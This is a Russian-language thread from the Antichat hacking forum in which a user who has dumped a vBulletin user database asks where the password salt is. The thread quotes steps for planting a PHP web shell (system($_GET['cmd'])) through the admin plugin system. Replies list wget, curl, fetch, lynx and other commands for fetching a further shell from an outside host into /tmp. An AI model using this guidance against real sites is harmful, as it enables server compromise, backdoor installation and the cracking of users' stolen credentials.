Форум АНТИЧАТ - vBulletin [db] Где соль?

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)

- - vBulletin [db] Где соль? (https://forum.antichat.xyz/showthread.php?t=31331)

vBulletin [db] Где соль?

Может глупый вопрос, но что-то понять не могу. Вот сдамбил базу юзеров, получил примерно вот такую тему:

PHP код:


		
			
INSERT INTO vb_user VALUES('1','6','','0','Rich','6c507b8dd286d058e69a37436a751bde','2006-11-20','***@gmail.com','0','','','','','','2','Администратор','0','1127663100','0','1159464415','1163971905','1152297660','33','10','5','3','0','0','0','0','2135','','0000-00-00','-1','1','','0','0','','0','0','-1','0','0','p\\u','2','','2','1','1');

А соль здесь получается "p\\u", или что?

Добавил: И что бы новую тему не создавать, помгите пожалуйста.

Цитата:

1. Заходим в админку.
2. Система модулей.
3. Добавить новый модуль.
Продукт: ставим vBulletin
Месторасположение: Vbulletin: Справка - faq_complete
Вставляем в тело код нашего шелла (шелл не должен превышать 60кб), проще сделать system($_GET["cmd"]);
4. Сохраняем, идём в faq (справка), всё теперь у нас есть шелл. Если он был такой system($_GET["cmd"]); делаем так www.xz.сom/forumpath/faq.php?cmd=тут команда

А какой камандой после этого можно будет залить шелл на хост (FreeBSD)?

соль в булке состоит из 3 знаков, может в другой таблице

Цитата:

Сообщение от maxster

соль в булке состоит из 3 знаков, может в другой таблице

Лучше от этого мне не стало. :) Кстати во второй базе такая же тема, может что не так делаю? Да по другому вроде никак.

А может вообще в булке быть пароль без соли?

да вот она "p\u"..просто первый символ "\" добавляется для экранирования некоторых символов (в данном случае "\"), который могут нарушить работу скрипта.

Цитата:

А какой камандой после этого можно будет залить шелл на хост (FreeBSD)?

вбиваешь
which wget fetch curl links lynx
и смотришь какие качалки есть. в зависимости от этого вбиваешь нужное

Код:

- wget -o /tmp/file.c http://site.ru/file.c

- curl -o /tmp/file.c http://site.ru/file.c

- fetch -o /tmp/file.c http://site.ru/file.c

- lynx -source "http://site.ru/file.c" > /tmp/file.c

- links  -source "http://site.ru/file.c" > /tmp/file.c

- GET http://site.ru/file.c > /tmp/file.c

на примере ты скачиваешь с сайта site.ru файл file.с и сохраняешь его в папке /tmp

Цитата:

Сообщение от Krasti

Цитата:
1. Заходим в админку.
2. Система модулей.
3. Добавить новый модуль.
Продукт: ставим vBulletin
Месторасположение: Vbulletin: Справка - faq_complete
Вставляем в тело код нашего шелла (шелл не должен превышать 60кб), проще сделать system($_GET["cmd"]);
4. Сохраняем, идём в faq (справка), всё теперь у нас есть шелл. Если он был такой system($_GET["cmd"]); делаем так www.xz.сom/forumpath/faq.php?cmd=тут команда
А какой камандой после этого можно будет залить шелл на хост (FreeBSD)?

собственно шелл ты мы уже получили, зачем еще один :confused:

Цитата:

Сообщение от +toxa+

вбиваешь
which wget fetch curl links lynx
и смотришь какие качалки есть. в зависимости от этого вбиваешь нужное

Код:

- wget -o /tmp/file.c http://site.ru/file.c

- curl -o /tmp/file.c http://site.ru/file.c

- fetch -o /tmp/file.c http://site.ru/file.c

- lynx -source "http://site.ru/file.c" > /tmp/file.c

- links  -source "http://site.ru/file.c" > /tmp/file.c

- GET http://site.ru/file.c > /tmp/file.c

на примере ты скачиваешь с сайта site.ru файл file.с и сохраняешь его в папке /tmp

Большое спасибо!

Цитата:

Сообщение от злюка

собственно шелл ты мы уже получили, зачем еще один :confused:

Я понимаю, что шелл есть, просто юзать такой шелл для меня труднова-то. Вот я и хочу залить шелл, который мне нравится. :) Кстати, спасибо за помощь.

вместо этого смд можешь спокойно заливать свой нормальный шелл!

Да я знаю, но работать он что-то отказывался. А смд пашет нормально. :)